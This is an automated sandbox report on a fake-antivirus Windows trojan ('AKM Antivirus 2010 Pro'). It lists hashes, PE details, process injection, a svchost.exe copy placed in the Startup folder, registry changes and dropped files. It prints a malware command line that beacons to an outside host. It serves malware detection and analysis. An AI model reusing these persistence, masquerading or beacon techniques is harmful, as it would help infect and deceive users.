File name:

aa5b7f3a9b1a8a3a91f49e991b68779264814f0b70ca95add165f0586b799be1

Full analysis: https://app.any.run/tasks/af2d27be-f409-4a01-8986-c17ce0d5265c
Verdict: Malicious activity
Analysis date: December 06, 2022, 04:12:19
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
MD5:

FEF4457233CA1E5C0786650A679402B4

SHA1:

64250C907712275F12F97A9B971F7AE17BE1BD8F

SHA256:

AA5B7F3A9B1A8A3A91F49E991B68779264814F0B70CA95ADD165F0586B799BE1

SSDEEP:

24576:zJSfxf+iXGTRQx13AU/36w6IhLLbsmvVmGHdKQnvL3kz:zgfxmmx1QM36J0fZH7jUz

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • alggui.exe (PID: 2880)
      • alggui.exe (PID: 2776)
      • win36C1.tmp (PID: 3944)
      • svchost.exe (PID: 3444)
      • svchost.exe (PID: 4052)
      • svchost.exe (PID: 2976)
      • svchost.exe (PID: 1884)
      • svchost.exe (PID: 1968)
      • svchost.exe (PID: 3392)
    • Runs injected code in another process

      • win36C1.tmp (PID: 3944)
    • Drops the executable file immediately after the start

      • AKM Antivirus 2010 Pro.exe (PID: 2204)
      • aa5b7f3a9b1a8a3a91f49e991b68779264814f0b70ca95add165f0586b799be1.exe (PID: 1328)
    • Application was injected by another process

      • Explorer.EXE (PID: 1084)
      • Dwm.exe (PID: 612)
  • SUSPICIOUS

    • Application launched itself

      • alggui.exe (PID: 2776)
      • AKM Antivirus 2010 Pro.exe (PID: 2992)
      • aa5b7f3a9b1a8a3a91f49e991b68779264814f0b70ca95add165f0586b799be1.exe (PID: 1328)
      • svchost.exe (PID: 3444)
      • AKM Antivirus 2010 Pro.exe (PID: 2204)
      • AKM Antivirus 2010 Pro.exe (PID: 4020)
      • svchost.exe (PID: 2976)
      • svchost.exe (PID: 1884)
    • Executable content was dropped or overwritten

      • AKM Antivirus 2010 Pro.exe (PID: 2204)
      • aa5b7f3a9b1a8a3a91f49e991b68779264814f0b70ca95add165f0586b799be1.exe (PID: 1328)
    • Starts itself from another location

      • aa5b7f3a9b1a8a3a91f49e991b68779264814f0b70ca95add165f0586b799be1.exe (PID: 1328)
      • svchost.exe (PID: 3444)
      • svchost.exe (PID: 2976)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | UPX compressed Win32 Executable (39.3)
.exe | Win32 EXE Yoda's Crypter (38.6)
.dll | Win32 Dynamic Link Library (generic) (9.5)
.exe | Win32 Executable (generic) (6.5)
.exe | Generic Win/DOS Executable (2.9)

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 2010-May-04 12:51:01
Detected languages:
  • English - United States
  • Russian - Russia
CompanyName: ADC ltd.
FileVersion: 1.0.0.1
InternalName: wpp.exe
LegalCopyright: (c) ADC ltd. All rights reserved.
ProductVersion: 1.0.0.1

DOS Header

e_magic: MZ
e_cblp: 144
e_cp: 3
e_crlc: 0
e_cparhdr: 4
e_minalloc: 0
e_maxalloc: 65535
e_ss: 0
e_sp: 184
e_csum: 0
e_ip: 0
e_cs: 0
e_ovno: 0
e_oemid: 0
e_oeminfo: 0
e_lfanew: 232

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
NumberofSections: 3
TimeDateStamp: 2010-May-04 12:51:01
PointerToSymbolTable: 0
NumberOfSymbols: 0
SizeOfOptionalHeader: 224
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_RELOCS_STRIPPED

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
UPX0
4096
7086080
0
IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1
7090176
1028096
1026048
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
7.95629
.rsrc
8118272
24576
23040
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
3.96274

Resources

Title
Entropy
Size
Codepage
Language
Type
1
4.17624
7336
UNKNOWN
Russian - Russia
RT_ICON
2
4.27942
3240
UNKNOWN
Russian - Russia
RT_ICON
3
4.20139
872
UNKNOWN
Russian - Russia
RT_ICON
4
7.81066
3240
UNKNOWN
Russian - Russia
RT_ICON
5
7.81324
3240
UNKNOWN
Russian - Russia
RT_ICON
6
7.64942
872
UNKNOWN
Russian - Russia
RT_ICON
7
7.65907
872
UNKNOWN
Russian - Russia
RT_ICON
8
7.67007
1128
UNKNOWN
Russian - Russia
RT_ICON
9
7.76091
2040
UNKNOWN
Russian - Russia
RT_ICON
10
7.76721
2040
UNKNOWN
Russian - Russia
RT_ICON

Imports

ADVAPI32.dll
COMCTL32.dll
GDI32.dll
KERNEL32.DLL
OLEAUT32.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
WINMM.dll
WINSPOOL.DRV
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
52
Monitored processes
19
Malicious processes
6
Suspicious processes
2

Behavior graph

Click at the process to see the details
drop and start drop and start start drop and start drop and start drop and start inject inject aa5b7f3a9b1a8a3a91f49e991b68779264814f0b70ca95add165f0586b799be1.exe aa5b7f3a9b1a8a3a91f49e991b68779264814f0b70ca95add165f0586b799be1.exe no specs akm antivirus 2010 pro.exe akm antivirus 2010 pro.exe no specs svchost.exe no specs win36c1.tmp no specs svchost.exe no specs alggui.exe no specs alggui.exe no specs explorer.exe dwm.exe svchost.exe no specs akm antivirus 2010 pro.exe no specs akm antivirus 2010 pro.exe no specs svchost.exe no specs svchost.exe no specs akm antivirus 2010 pro.exe no specs svchost.exe no specs akm antivirus 2010 pro.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1328"C:\Users\admin\AppData\Local\Temp\aa5b7f3a9b1a8a3a91f49e991b68779264814f0b70ca95add165f0586b799be1.exe" C:\Users\admin\AppData\Local\Temp\aa5b7f3a9b1a8a3a91f49e991b68779264814f0b70ca95add165f0586b799be1.exe
Explorer.EXE
User:
admin
Company:
ADC ltd.
Integrity Level:
MEDIUM
Exit code:
0
Version:
1.0.0.1
2420"C:\Users\admin\AppData\Local\Temp\aa5b7f3a9b1a8a3a91f49e991b68779264814f0b70ca95add165f0586b799be1.exe"C:\Users\admin\AppData\Local\Temp\aa5b7f3a9b1a8a3a91f49e991b68779264814f0b70ca95add165f0586b799be1.exeaa5b7f3a9b1a8a3a91f49e991b68779264814f0b70ca95add165f0586b799be1.exe
User:
admin
Company:
ADC ltd.
Integrity Level:
MEDIUM
Exit code:
0
Version:
1.0.0.1
2204"C:\Users\admin\AppData\Roaming\AKM Antivirus 2010 Pro\AKM Antivirus 2010 Pro.exe"C:\Users\admin\AppData\Roaming\AKM Antivirus 2010 Pro\AKM Antivirus 2010 Pro.exe
aa5b7f3a9b1a8a3a91f49e991b68779264814f0b70ca95add165f0586b799be1.exe
User:
admin
Company:
ADC ltd.
Integrity Level:
MEDIUM
Version:
1.0.0.1
984"C:\Users\admin\AppData\Roaming\AKM Antivirus 2010 Pro\AKM Antivirus 2010 Pro.exe"C:\Users\admin\AppData\Roaming\AKM Antivirus 2010 Pro\AKM Antivirus 2010 Pro.exeAKM Antivirus 2010 Pro.exe
User:
admin
Company:
ADC ltd.
Integrity Level:
MEDIUM
Exit code:
0
Version:
1.0.0.1
3444"C:\Users\admin\AppData\Roaming\svchost.exe"C:\Users\admin\AppData\Roaming\svchost.exeAKM Antivirus 2010 Pro.exe
User:
admin
Integrity Level:
MEDIUM
3944C:\Users\admin\AppData\Local\Temp\win36C1.tmp "http://core2637.instituteofbianco.com/stat/action3.cgi?p=3&a=2637" "C:\Users\admin\AppData\Local\Temp\win3672.tmp" 1C:\Users\admin\AppData\Local\Temp\win36C1.tmpAKM Antivirus 2010 Pro.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
1
4052"C:\Users\admin\AppData\Roaming\svchost.exe"C:\Users\admin\AppData\Roaming\svchost.exesvchost.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2776"C:\Users\admin\AppData\Roaming\alggui.exe"C:\Users\admin\AppData\Roaming\alggui.exeAKM Antivirus 2010 Pro.exe
User:
admin
Integrity Level:
MEDIUM
2880"C:\Users\admin\AppData\Roaming\alggui.exe"C:\Users\admin\AppData\Roaming\alggui.exealggui.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1084C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
3 715
Read events
3 614
Write events
97
Delete events
4

Modification events

(PID) Process:(2204) AKM Antivirus 2010 Pro.exeKey:HKEY_CURRENT_USER\Software\AKM Antivirus 2010 Pro\AKM Antivirus 2010 Pro\setdata
Operation:writeName:scantime
Value:
6.12.2022 4:12:42
(PID) Process:(2204) AKM Antivirus 2010 Pro.exeKey:HKEY_CURRENT_USER\Software\AKM Antivirus 2010 Pro\AKM Antivirus 2010 Pro\setdata
Operation:writeName:scncnt
Value:
1
(PID) Process:(2204) AKM Antivirus 2010 Pro.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2204) AKM Antivirus 2010 Pro.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2204) AKM Antivirus 2010 Pro.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2204) AKM Antivirus 2010 Pro.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(2204) AKM Antivirus 2010 Pro.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:ProxyEnable
Value:
0
(PID) Process:(2204) AKM Antivirus 2010 Pro.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation:writeName:SavedLegacySettings
Value:
460000003D010000090000000000000000000000000000000400000000000000C0E333BBEAB1D3010000000000000000000000000100000002000000C0A80164000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:(2204) AKM Antivirus 2010 Pro.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(2204) AKM Antivirus 2010 Pro.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
Executable files
5
Suspicious files
2
Text files
2
Unknown types
2

Dropped files

PID
Process
Filename
Type
2204AKM Antivirus 2010 Pro.exeC:\Users\admin\AppData\Roaming\skynet.datbinary
MD5:80E76D2C559D40ADCAAEB2C551C9B689
SHA256:72733608BD19B6BB4259C4A7D3AFCE48763F16683CA001CF692DF2B922D61FCA
2204AKM Antivirus 2010 Pro.exeC:\Users\admin\AppData\Roaming\wp4.dattext
MD5:48A8ED30532B2D13B7144224FC8BE28D
SHA256:CFF79721D13BB4FC11D40E25C02DF8DADF288097D5A55280B84C65C45E4C1856
2204AKM Antivirus 2010 Pro.exeC:\Users\admin\Desktop\AKM Antivirus 2010 Pro.lnklnk
MD5:D6F0CC2863F68A867F9DFB406083F664
SHA256:58D6339297B4BB0640D98AB6A69EDEC7745375744F98439FE142BD59D51F77D7
2204AKM Antivirus 2010 Pro.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AKM Antivirus 2010 Pro\AKM Antivirus 2010 Pro.lnklnk
MD5:6D7965B0A8E60E6690ADDE8161DCE952
SHA256:B10B6BF93EDFEB43693892DDC79BD8F3CCD66005EF41B77F207BD248CC5CF933
2204AKM Antivirus 2010 Pro.exeC:\Users\admin\AppData\Roaming\alggui.exeexecutable
MD5:C30F9FBAE94339552823E65D77EDAA8C
SHA256:F9D2BFAE965B641C8AD4C01299B4B7BA07B6B7B8843952ADF23168780E28F655
2204AKM Antivirus 2010 Pro.exeC:\Users\admin\AppData\Local\Temp\win36C1.tmpexecutable
MD5:ED21B352D000691F00EBBE08B265DB66
SHA256:62ED3C2009D67DF1D28E8C80E311B2243F94E10D4A83ED014166257F734D7B24
2204AKM Antivirus 2010 Pro.exeC:\Users\admin\AppData\Roaming\svchost.exeexecutable
MD5:0AAEEB21A16E02D2DB265B7D4AA5FA74
SHA256:22E06F66B67FDF3077E389FE1FF26612DD3C24A0F05BBF143180D13F71EC0E59
2204AKM Antivirus 2010 Pro.exeC:\Users\admin\AppData\Roaming\nuar.oldtext
MD5:5EC83D5A5A3248AC8CE878496B1E15AE
SHA256:511E98C2AA0E57008B3734C7DF5F64426178C353EE777447D3B3EAEFFE9200A9
2204AKM Antivirus 2010 Pro.exeC:\Users\admin\AppData\Roaming\wp3.datbinary
MD5:CFCD208495D565EF66E7DFF9F98764DA
SHA256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
2204AKM Antivirus 2010 Pro.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exeexecutable
MD5:0AAEEB21A16E02D2DB265B7D4AA5FA74
SHA256:22E06F66B67FDF3077E389FE1FF26612DD3C24A0F05BBF143180D13F71EC0E59
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

Domain
IP
Reputation
time.windows.com
  • 40.119.148.38
whitelisted
core2637.instituteofbianco.com
unknown

Threats

No threats detected
No debug info